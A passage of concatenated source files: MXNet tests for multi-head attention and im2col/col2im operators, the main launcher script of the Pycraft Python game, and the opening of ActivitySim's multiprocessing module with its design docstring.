k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@with_seed()
@pytest.mark.serial
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
def test_elemwise_sum_for_gradient_accumulation():
for nrepeat in range(1, 10):
stored_grad = dict()
for grad_req in ['write', 'add']:
a = mx.nd.array([1])
b = mx.nd.array([2])
if grad_req == 'write':
a.attach_grad(grad_req='write')
elif grad_req == 'add':
a.attach_grad(grad_req='add')
a.grad[:] = 0
with mx.autograd.record():
for _ in range(nrepeat):
b = b * a
b.backward()
stored_grad[grad_req] = a.grad.asscalar()
assert stored_grad['write'] == stored_grad['add']
assert stored_grad['write'] == 2 * nrepeat
|
main.py
|
print("Started <Pycraft_main>")
class Startup:
def __init__(Class_Startup_variables):
try:
import tkinter as tk
Class_Startup_variables.mod_Tkinter__tk = tk # [Class_Startup_variables] mod (module) (module name) (subsection of module) (name references)
import tkinter.ttk # Class _ <class_name> _ variables
Class_Startup_variables.mod_Tkinter_ttk_ = tkinter.ttk
from tkinter import messagebox
Class_Startup_variables.mod_Tkinter_messagebox_ = messagebox
from PIL import Image, ImageFilter, ImageGrab, ImageTk
Class_Startup_variables.mod_PIL_Image_ = Image
Class_Startup_variables.mod_PIL_ImageFilter_ = ImageFilter
Class_Startup_variables.mod_PIL_ImageTk_ = ImageTk
Class_Startup_variables.mod_PIL_ImageGrab_ = ImageGrab
import pygame
Class_Startup_variables.mod_Pygame__ = pygame
import numpy
Class_Startup_variables.mod_Numpy__ = numpy
import os
Class_Startup_variables.mod_OS__ = os
import sys
Class_Startup_variables.mod_Sys__ = sys
import random
Class_Startup_variables.mod_Random__ = random
import time
Class_Startup_variables.mod_Time__ = time
import pygame.locals
Class_Startup_variables.mod_Pygame_locals_ = pygame.locals
import OpenGL
Class_Startup_variables.mod_OpenGL__ = OpenGL
import OpenGL.GL
Class_Startup_variables.mod_OpenGL_GL_ = OpenGL.GL
import OpenGL.GLU
Class_Startup_variables.mod_OpenGL_GLU_ = OpenGL.GLU
import OpenGL.GLUT
Class_Startup_variables.mod_OpenGL_GLUT_ = OpenGL.GLUT
import moderngl
Class_Startup_variables.mod_ModernGL__ = moderngl
import moderngl_window
Class_Startup_variables.mod_ModernGL_window_ = moderngl_window
import pyautogui
Class_Startup_variables.mod_Pyautogui__ = pyautogui
import psutil
Class_Startup_variables.mod_Psutil__ = psutil
import timeit
Class_Startup_variables.mod_Timeit__ = timeit
import subprocess
Class_Startup_variables.mod_Subprocess__ = subprocess
import traceback
Class_Startup_variables.mod_Traceback__ = traceback
import datetime
Class_Startup_variables.mod_Datetime__ = datetime
import ctypes
Class_Startup_variables.mod_Ctypes__ = ctypes
import json
Class_Startup_variables.mod_JSON__ = json
import threading
Class_Startup_variables.mod_Threading__ = threading
import cpuinfo
Class_Startup_variables.mod_CPUinfo__ = cpuinfo
import array
Class_Startup_variables.mod_Array__ = array
import GPUtil
Class_Startup_variables.mod_GPUtil__ = GPUtil
from tabulate import tabulate
Class_Startup_variables.mod_Tabulate_tabulate_ = tabulate
from pyrr import Matrix44
Class_Startup_variables.mod_Pyrr_Matrix44_ = Matrix44
Class_Startup_variables.mod_urllib_request_ = None
moderngl.create_standalone_context()
os.environ['SDL_VIDEO_CENTERED'] = '1'
Class_Startup_variables.mod_Pygame__.init()
import PycraftStartupTest
Class_Startup_variables.mod_PycraftStartupTest__ = PycraftStartupTest
import StartupAnimation
Class_Startup_variables.mod_StartupAnimation__ = StartupAnimation
import DisplayUtils
Class_Startup_variables.mod_DisplayUtils__ = DisplayUtils
import GetSavedData
Class_Startup_variables.mod_GetSavedData__ = GetSavedData
import ThemeUtils
Class_Startup_variables.mod_ThemeUtils__ = ThemeUtils
import HomeScreen
Class_Startup_variables.mod_HomeScreen__ = HomeScreen
import SoundUtils
Class_Startup_variables.mod_SoundUtils__ = SoundUtils
import DrawingUtils
Class_Startup_variables.mod_DrawingUtils__ = DrawingUtils
import CaptionUtils
Class_Startup_variables.mod_CaptionUtils__ = CaptionUtils
import Credits
Class_Startup_variables.mod_Credits__ = Credits
import TkinterUtils
Class_Startup_variables.mod_TkinterUtils__ = TkinterUtils
import Achievements
Class_Startup_variables.mod_Achievements__ = Achievements
import CharacterDesigner
Class_Startup_variables.mod_CharacterDesigner__ = CharacterDesigner
import Settings
Class_Startup_variables.mod_Settings__ = Settings
import Benchmark
Class_Startup_variables.mod_Benchmark__ = Benchmark
import ExBenchmark
Class_Startup_variables.mod_ExBenchmark__ = ExBenchmark
import OGLbenchmark
Class_Startup_variables.mod_OGLbenchmark__ = OGLbenchmark
import base
Class_Startup_variables.mod_Base__ = base
import ShareDataUtil
Class_Startup_variables.mod_Globals__ = ShareDataUtil
import TextUtils
Class_Startup_variables.mod_TextUtils__ = TextUtils
import Inventory
Class_Startup_variables.mod_Inventory__ = Inventory
import ImageUtils
Class_Startup_variables.mod_ImageUtils__ = ImageUtils
import MapGUI
Class_Startup_variables.mod_MapGUI__ = MapGUI
import ThreadingUtil
Class_Startup_variables.mod_ThreadingUtil__ = ThreadingUtil
import IntegratedInstaller
Class_Startup_variables.mod_IntegInstaller__ = IntegratedInstaller
Class_Startup_variables.aa = True
Class_Startup_variables.AccentCol = (237, 125, 49)
Class_Startup_variables.aFPS = 0
Class_Startup_variables.BackgroundCol = [30, 30, 30]
Class_Startup_variables.base_folder = os.path.dirname(__file__)
Class_Startup_variables.cameraANGspeed = 3.5
Class_Startup_variables.clock = pygame.time.Clock()
Class_Startup_variables.Collisions = [False, 0]
Class_Startup_variables.CompletePercent = 0
Class_Startup_variables.ctx = 0
Class_Startup_variables.Load_Progress = 0
Class_Startup_variables.ConnectionPermission = None
Class_Startup_variables.ConnectionStatus = False
Class_Startup_variables.crash = False
Class_Startup_variables.CurrentlyPlaying = None
Class_Startup_variables.Data_aFPS_Min = 60
Class_Startup_variables.Data_aFPS = []
Class_Startup_variables.Data_aFPS_Max = 1
Class_Startup_variables.Data_CPUUsE_Min = 60
Class_Startup_variables.Data_CPUUsE = []
Class_Startup_variables.Data_CPUUsE_Max = 1
Class_Startup_variables.Data_eFPS_Min = 60
Class_Startup_variables.Data_eFPS = []
Class_Startup_variables.Data_eFPS_Max = 1
Class_Startup_variables.Data_MemUsE_Min = 60
Class_Startup_variables.Data_MemUsE = []
Class_Startup_variables.Data_MemUsE_Max = 1
Class_Startup_variables.Data_CPUUsE_Min = 60
Class_Startup_variables.Data_CPUUsE = []
Class_Startup_variables.Data_CPUUsE_Max = 1
Class_Startup_variables.Devmode = 0
Class_Startup_variables.Display = 0
Class_Startup_variables.eFPS = 60
Class_Startup_variables.FanSky = True
Class_Startup_variables.FanPart = True
Class_Startup_variables.FontCol = (255, 255, 255)
Class_Startup_variables.FOV = 70
Class_Startup_variables.FromPlay = False
Class_Startup_variables.Fullscreen = False
Class_Startup_variables.FPS = 60
Class_Startup_variables.FullscreenX, Class_Startup_variables.FullscreenY = pyautogui.size()
Class_Startup_variables.GameError = None
Class_Startup_variables.G3Dscale = 600000
Class_Startup_variables.GetScreenGraphics = True
Class_Startup_variables.HUD_Surface = None
Class_Startup_variables.Iteration = 1
Class_Startup_variables.lastRun = "29/09/2021"
Class_Startup_variables.Load3D = True
Class_Startup_variables.LoadMusic = True
Class_Startup_variables.music = True
Class_Startup_variables.musicVOL = 5
Class_Startup_variables.Numpy_map_vertices = 0
Class_Startup_variables.Outdated = False
Class_Startup_variables.Progress_Line = []
Class_Startup_variables.ProgressMessageText = "Initiating"
Class_Startup_variables.realHeight = 720
Class_Startup_variables.realWidth = 1280
Class_Startup_variables.RecommendedFPS = 60
Class_Startup_variables.RenderFOG = True
Class_Startup_variables.RunFullStartup = False
Class_Startup_variables.SecondFontCol = (100, 100, 100)
Class_Startup_variables.SavedWidth = 1280
Class_Startup_variables.SavedHeight = 720
Class_Startup_variables.ShapeCol = (80, 80, 80)
Class_Startup_variables.skybox_texture = 0
Class_Startup_variables.sound = True
Class_Startup_variables.soundVOL = 75
Class_Startup_variables.Stop_Thread_Event = Class_Startup_variables.mod_Threading__.Event()
Class_Startup_variables.SettingsPreference = "Medium"
Class_Startup_variables.theme = False
Class_Startup_variables.ThreadStatus = "Running"
Class_Startup_variables.Timer = 0
Class_Startup_variables.TotalNumUpdate = 0
Class_Startup_variables.Total_move_x = 0
Class_Startup_variables.Total_move_y = 0
Class_Startup_variables.Total_move_z = 0
Class_Startup_variables.TotalRotation = 0
Class_Startup_variables.Total_Vertices = 0
Class_Startup_variables.version = "0.9.3"
Class_Startup_variables.vertex = 0
Class_Startup_variables.X = 0
Class_Startup_variables.Y = 0
Class_Startup_variables.Z = 0
Class_Startup_variables.Thread_StartLongThread = Class_Startup_variables.mod_Threading__.Thread(target=Class_Startup_variables.mod_ThreadingUtil__.ThreadingUtils.StartVariableChecking, args=(Class_Startup_variables,))
Class_Startup_variables.Thread_StartLongThread.start()
Class_Startup_variables.Thread_StartLongThread.name = "Thread_StartLongThread"
Class_Startup_variables.Thread_GetCPUMetrics = Class_Startup_variables.mod_Threading__.Thread(target=Class_Startup_variables.mod_ThreadingUtil__.ThreadingUtils.StartCPUlogging, args=(Class_Startup_variables,))
Class_Startup_variables.Thread_GetCPUMetrics.start()
Class_Startup_variables.Thread_GetCPUMetrics.name = "Thread_GetCPUMetrics"
Class_Startup_variables.Thread_AdaptiveMode = Class_Startup_variables.mod_Threading__.Thread(target=Class_Startup_variables.mod_ThreadingUtil__.ThreadingUtils.AdaptiveMode, args=(Class_Startup_variables,))
Class_Startup_variables.Thread_AdaptiveMode.start()
Class_Startup_variables.Thread_AdaptiveMode.name = "Thread_AdaptiveMode"
Class_Startup_variables.mod_Globals__.Share.initialize(Class_Startup_variables)
import GameEngine
Class_Startup_variables.mod_MainGameEngine__ = GameEngine
except Exception as error:
print(error)
try:
import tkinter as tk
root = tk.Tk()
root.withdraw()
Class_Startup_variables.mod_Tkinter_messagebox_.showerror("Startup Fail", "Missing required modules")
quit()
except:
try:
Class_Startup_variables.mod_Pygame__.quit()
sys.exit("0.0.0 -Thank you for playing")
except:
quit()
def crash(ErrorREPORT):
Class_Startup_variables.Stop_Thread_Event.set()
if not ErrorREPORT == None:
Class_Startup_variables.mod_Pygame__.quit()
Class_Startup_variables.mod_Time__.sleep(1.01)
Class_Startup_variables.mod_Pygame__.init()
Class_Startup_variables.mod_Pygame__.mixer.stop()
try:
Message = Class_Startup_variables.mod_GetSavedData__.LoadSaveFiles.SaveTOconfigFILE(Class_Startup_variables)
Class_Startup_variables.mod_Pygame__.display.quit()
Class_Startup_variables.mod_Pygame__.init()
Display = Class_Startup_variables.mod_Pygame__.display.set_mode((1280, 720))
icon = Class_Startup_variables.mod_Pygame__.image.load(Class_Startup_variables.mod_OS__.path.join(Class_Startup_variables.base_folder, ("Resources\\General_Resources\\Icon.jpg"))).convert()
Class_Startup_variables.mod_Pygame__.display.set_icon(icon)
Class_Startup_variables.mod_Pygame__.display.set_caption(f"Pycraft: An Error Occurred")
MessageFont = Class_Startup_variables.mod_Pygame__.font.Font(Class_Startup_variables.mod_OS__.path.join(Class_Startup_variables.base_folder,("Fonts\\Book Antiqua.ttf")), 15)
ErrorMessageText = MessageFont.render(str(ErrorREPORT), True, (255,0,0))
ErrorMessageTextWidth = ErrorMessageText.get_width()
ErrorMessageTextHeight = ErrorMessageText.get_height()
Display = Class_Startup_variables.mod_Pygame__.display.set_mode((1280,720))
IconImage = Class_Startup_variables.mod_Pygame__.image.load(Class_Startup_variables.mod_OS__.path.join(Class_Startup_variables.base_folder,("Resources\\Error_Resources\\Icon.jpg")))
Class_Startup_variables.mod_Pygame__.display.set_icon(IconImage)
image = Class_Startup_variables.mod_Pygame__.image.load(Class_Startup_variables.mod_OS__.path.join(Class_Startup_variables.base_folder,("Resources\\Error_Resources\\Error_Message.png")))
Clock = Class_Startup_variables.mod_Pygame__.time.Clock()
while True:
Display.fill((20,20,20))
Display.blit(image, (0,0))
Display.blit(ErrorMessageText, ((((1280/2)-ErrorMessageTextWidth)/2), (720-ErrorMessageTextHeight)/2))
for event in Class_Startup_variables.mod_Pygame__.event.get():
if event.type == Class_Startup_variables.mod_Pygame__.QUIT:
Class_Startup_variables.Thread_StartLongThread.join()
Class_Startup_variables.Thread_AdaptiveMode.join()
Class_Startup_variables.Thread_GetCPUMetrics.join()
Class_Startup_variables.mod_Pygame__.quit()
Class_Startup_variables.mod_Sys__.exit(f"0.1.0- Thank you for playing")
Class_Startup_variables.mod_Pygame__.display.flip()
Clock.tick(30)
except Exception as error:
Class_Startup_variables.mod_Sys__.exit(f"0.2.0- {error} Thank you for playing")
else:
try:
Class_Startup_variables.mod_Pygame__.quit()
except Exception as error:
Class_Startup_variables.mod_Sys__.exit(f"0.3.0- {error} Thank you for playing")
quit()
else:
Class_Startup_variables.mod_Sys__.exit("0.4.0- Thank you for playing")
quit()
Class_Startup_variables = Startup()
try:
Class_Startup_variables.mod_GetSavedData__.LoadSaveFiles.ReadMainSave(Class_Startup_variables)
except Exception as FileError:
Report = Class_Startup_variables.mod_GetSavedData__.LoadSaveFiles.RepairLostSave(Class_Startup_variables)
ErrorString = "Unable to access saved data, we have atttempted to repair the missing data, please try again", FileError
Message = "0.0.0- " + str(ErrorString)
Startup.crash(Message)
if Class_Startup_variables.ConnectionPermission == None:
Class_Startup_variables.mod_TkinterUtils__.TkinterInfo.GetPermissions(Class_Startup_variables)
if Class_Startup_variables.ConnectionPermission == True:
import urllib.request
Class_Startup_variables.mod_urllib_request_ = urllib.request
Class_Startup_variables.ConnectionStatus = Class_Startup_variables.mod_IntegInstaller__.CheckConnection.test(Class_Startup_variables)
if Class_Startup_variables.ConnectionStatus == True:
Class_Startup_variables.Thread_Get_Outdated = Class_Startup_variables.mod_Threading__.Thread(target=Class_Startup_variables.mod_IntegInstaller__.IntegInstaller.CheckVersions, args=(Class_Startup_variables,))
Class_Startup_variables.Thread_Get_Outdated.start()
Class_Startup_variables.Thread_Get_Outdated.name = "Thread_Get_Outdated"
Message = Class_Startup_variables.mod_PycraftStartupTest__.StartupTest.PycraftSelfTest(Class_Startup_variables)
if not Message == None:
Message = "0.0.3- " + str(Message)
Startup.crash(Message)
if Class_Startup_variables.theme == False:
Message = Class_Startup_variables.mod_ThemeUtils__.DetermineThemeColours.GetThemeGUI(Class_Startup_variables)
if not Message == None:
Message = "0.0.4- " + str(Message)
Startup.crash(Message)
Message = Class_Startup_variables.mod_ThemeUtils__.DetermineThemeColours.GetColours(Class_Startup_variables)
if not Message == None:
Message = "0.0.5- " + str(Message)
Startup.crash(Message)
Message = Class_Startup_variables.mod_StartupAnimation__.GenerateStartupScreen.Start(Class_Startup_variables)
if not Message == None:
Message = "0.0.6- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.Command = "Undefined"
while True:
if Class_Startup_variables.Command == "saveANDexit":
Message = Class_Startup_variables.mod_GetSavedData__.LoadSaveFiles.SaveTOconfigFILE(Class_Startup_variables)
if not Message == None:
Message = "0.0.7- " + str(Message)
Startup.crash(Message)
else:
Class_Startup_variables.Stop_Thread_Event.set()
Class_Startup_variables.Thread_StartLongThread.join()
Class_Startup_variables.Thread_AdaptiveMode.join()
Class_Startup_variables.Thread_GetCPUMetrics.join()
Class_Startup_variables.mod_Pygame__.quit()
Class_Startup_variables.mod_Sys__.exit("0.5.0- Thank you for playing") # 0 = Order of running, 5 = 5th occurrence down page
elif Class_Startup_variables.Command == "Credits":
Message = Class_Startup_variables.mod_Credits__.GenerateCredits.Credits(Class_Startup_variables)
if not Message == None:
Message = "0.0.8- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.Command = "Undefined"
elif Class_Startup_variables.Command == "Achievements":
Message = Class_Startup_variables.mod_Achievements__.GenerateAchievements.Achievements(Class_Startup_variables)
if not Message == None:
Message = "0.0.9- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.Command = "Undefined"
elif Class_Startup_variables.Command == "CharacterDesigner":
Message = Class_Startup_variables.mod_CharacterDesigner__.GenerateCharacterDesigner.CharacterDesigner(Class_Startup_variables)
if not Message == None:
Message = "0.0.10- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.Command = "Undefined"
elif Class_Startup_variables.Command == "Settings":
Message = Class_Startup_variables.mod_Settings__.GenerateSettings.settings(Class_Startup_variables)
if not Message == None:
Message = "0.0.11- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.Command = "Undefined"
elif Class_Startup_variables.Command == "Benchmark":
Message = Class_Startup_variables.mod_Benchmark__.GenerateBenchmarkMenu.Benchmark(Class_Startup_variables)
if not Message == None:
Message = "0.0.12- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.Command = "Undefined"
elif Class_Startup_variables.Command == "Play":
Message = Class_Startup_variables.mod_MainGameEngine__.CreateEngine.Play(Class_Startup_variables)
if Message == None:
Message = Class_Startup_variables.GameError
if not Message == None:
Message = "0.0.13- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.mod_Pygame__.init()
Class_Startup_variables.FromPlay = True
Message = Class_Startup_variables.mod_DisplayUtils__.DisplayUtils.SetDisplay(Class_Startup_variables)
if not Message == None:
Message = "0.0.14- " + str(Message)
Startup.crash(Message)
elif Class_Startup_variables.Command == "Inventory":
Message = Class_Startup_variables.mod_Inventory__.GenerateInventory.Inventory(Class_Startup_variables)
if not Message == None:
Message = "0.0.15- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.Command = "Play"
elif Class_Startup_variables.Command == "MapGUI":
Message = Class_Startup_variables.mod_MapGUI__.GenerateMapGUI.MapGUI(Class_Startup_variables)
if not Message == None:
Message = "0.0.16- " + str(Message)
Startup.crash(Message)
Class_Startup_variables.Command = "Play"
else:
Message, Class_Startup_variables.Command = Class_Startup_variables.mod_HomeScreen__.GenerateHomeScreen.Home_Screen(Class_Startup_variables)
if not Message == None:
Message = "0.0.17- " + str(Message)
Startup.crash(Message)
|
mp_tasks.py
|
# ActivitySim
# See full license in LICENSE.txt.
import sys
import os
import time
import logging
import multiprocessing
import traceback
from collections import OrderedDict
import yaml
import numpy as np
import pandas as pd
from activitysim.core import config
from activitysim.core import inject
from activitysim.core import mem
from activitysim.core import pipeline
from activitysim.core import tracing
from activitysim.core import util
from activitysim.core.config import setting
logger = logging.getLogger(__name__)
LAST_CHECKPOINT = '_'
MEM_TRACE_TICKS = 5
"""
mp_tasks - activitysim multiprocessing overview
Activitysim runs a list of models sequentially, performing various computational operations
on tables. Model steps can modify values in existing tables, add columns, or create additional
tables. Activitysim provides the facility, via expression files, to specify vectorized operations
on data tables. The ability to vectorize operations depends upon the independence of the
computations performed on the vectorized elements.
Python is agonizingly slow performing scalar operations sequentially on large datasets, so
vectorization (using pandas and/or numpy) is essential for good performance.
Fortunately most activity based model simulation steps are row independent at the household,
person, tour, or trip level. The decisions for one household are independent of the choices
made by other households. Thus it is (generally speaking) possible to run an entire simulation
on a household sample with only one household, and get the same result for that household as
you would running the simulation on a thousand households. (See the shared data section below
for an exception to this highly convenient situation.)
The random number generator supports this goal by providing streams of random numbers
for each households and person that are mutually independent and repeatable across model runs
and processes.
To the extent that simulation model steps are row independent, we can implement most simulations
as a series of vectorized operations on pandas DataFrames and numpy arrays. These vectorized
operations are much faster than sequential python because they are implemented by native code
(compiled C) and are to some extent multi-threaded. But the benefits of numpy multi-processing are
limited because they only apply to atomic numpy or pandas calls, and as soon as control returns
to python it is single-threaded and slow.
Multi-threading is not an attractive strategy to get around the python performance problem because
of the limitations imposed by python's global interpreter lock (GIL). Rather than struggling with
python multi-threading, this module uses the python multiprocessing to parallelize certain models.
Because of activitysim's modular and extensible architecture, we don't hardwire the multiprocessing
architecture. The specification of which models should be run in parallel, how many processers
should be used, and the segmentation of the data between processes are all specified in the
settings config file. For conceptual simplicity, the single processing model as treated as
dominant (because even though in practice multiprocessing may be the norm for production runs,
the single-processing model will be used in development and debugging and keeping it dominant
will tend to concentrate the multiprocessing-specific code in one place and prevent multiprocessing
considerations from permeating the code base obscuring the model-specific logic.
The primary function of the multiprocessing settings are to identify distinct stages of
computation, and to specify how many simultaneous processes should be used to perform them,
and how the data to be treated should be apportioned between those processes. We assume that
the data can be apportioned between subprocesses according to the index of a single primary table
(e.g. households) or else are by derivative or dependent tables that reference that table's index
(primary key) with a ref_col (foreign key) sharing the name of the primary table's key.
Generally speaking, we assume that any new tables that are created are directly dependent on the
previously existing tables, and all rows in new tables are either attributable to previously
existing rows in the pipeline tables, or are global utility tables that are identical across
sub-processes.
Note: There are a few exceptions to 'row independence', such as school and location choice models,
where the model behavior is externally constrained or adjusted. For instance, we want school
location choice to match known aggregate school enrollments by zone. Similarly, a parking model
